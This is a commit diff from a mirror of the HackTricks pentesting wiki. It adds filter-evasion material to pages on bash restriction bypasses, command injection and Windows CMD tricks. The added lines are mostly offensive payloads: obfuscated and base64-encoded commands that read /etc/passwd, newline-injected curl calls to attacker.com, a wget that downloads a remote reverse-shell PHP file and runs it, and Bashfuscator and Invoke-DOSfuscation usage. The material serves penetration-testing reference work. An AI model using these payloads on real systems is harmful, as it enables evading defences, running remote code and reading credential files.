0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#3532] No subject

This commit is contained in:
CPol 2022-10-02 22:00:14 +00:00 committed by gitbook-bot
parent 7b172583b0
commit 58e5a59ae2
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
3 changed files with 46 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
View File

@ -55,15 +55,27 @@ ls *
# [chars]
/usr/bin/n[c] # /usr/bin/nc
# Quotes / Concatenation
# Quotes
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
\u\n\a\m\e \-\a # uname -a
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64
#Backslashes
\u\n\a\m\e \-\a # uname -a
/\b\i\n/////s\h
# $@
who$@ami #whoami
# Transformations (case, reverse, base64)
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
$(rev<<<'imaohw') #whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64
# Execution through $0
echo whoami|$0
@ -124,6 +136,12 @@ cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
```
### Bypass pipes
```bash
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
```
### Bypass with hex encoding
```bash
@ -219,6 +237,13 @@ declare historywords
1%0a`curl http://attacker.com`
```
### Bashfuscator
```bash
# From https://github.com/Bashfuscator/Bashfuscator
./bashfuscator -c 'cat /etc/passwd'
```
### RCE with 5 chars
```bash

11
pentesting-web/command-injection.md
View File

@ -42,22 +42,17 @@ ls %0A id # %0A Execute both (RECOMMENDED)
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful
#Not execute but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
```
### **Limition** Bypasses
### Bypasses
If you are trying to execute **arbitrary commands inside a linux machine** you will be interesting in read about this **Bypasses:**
If you are trying to execute **arbitrary commands inside a linux machine** you will be interesting in read about this [**WAF bypasses**](../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md).
{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %}
[bypass-bash-restrictions.md](../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
{% endcontent-ref %}
### **Examples**
### **Examples:**
```
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php

18
windows-hardening/basic-cmd-for-pentesters.md
View File

@ -447,8 +447,22 @@ net helpmsg 32 #32 is the code in that case
### Bypass Char Blacklisting
```bash
echo %HOMEPATH:~6,-11%
\
echo %HOMEPATH:~6,-11% #\
who^ami #whoami
```
### DOSfuscation
Generates an obfuscated CMD line
```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
```
### Listen address ACLs